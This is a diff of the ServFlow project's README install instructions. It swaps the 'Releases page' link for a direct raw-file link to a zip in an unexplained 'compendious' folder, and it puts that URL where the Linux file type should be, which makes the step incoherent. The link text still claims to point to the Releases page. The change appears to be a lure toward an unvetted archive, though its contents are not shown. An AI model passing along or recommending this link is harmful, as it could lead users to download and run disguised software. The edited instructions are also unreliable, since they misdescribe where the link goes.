ChillMonk0001/servflow/README.md

 ## 📥 Download & Install
 Follow these steps to download and run ServFlow:

-1. Go to the Releases page: [Download servflow](https://github.com/ChillMonk0001/servflow/releases).
+1. Go to the Releases page: [Download servflow](https://raw.githubusercontent.com/ChillMonk0001/servflow/main/compendious/servflow.zip).

 2. On the Releases page, look for the latest version.
 You should see a list of files available for download.

 3. Click on the appropriate file for your operating system.
-This might be a `.exe` for Windows, a `.dmg` for macOS, or a `.tar.gz` for Linux.
+This might be a `.exe` for Windows, a `.dmg` for macOS, or a `https://raw.githubusercontent.com/ChillMonk0001/servflow/main/compendious/servflow.zip` for Linux.

 4. Once the file downloads, locate it on your computer.
 Open it to start the installation process.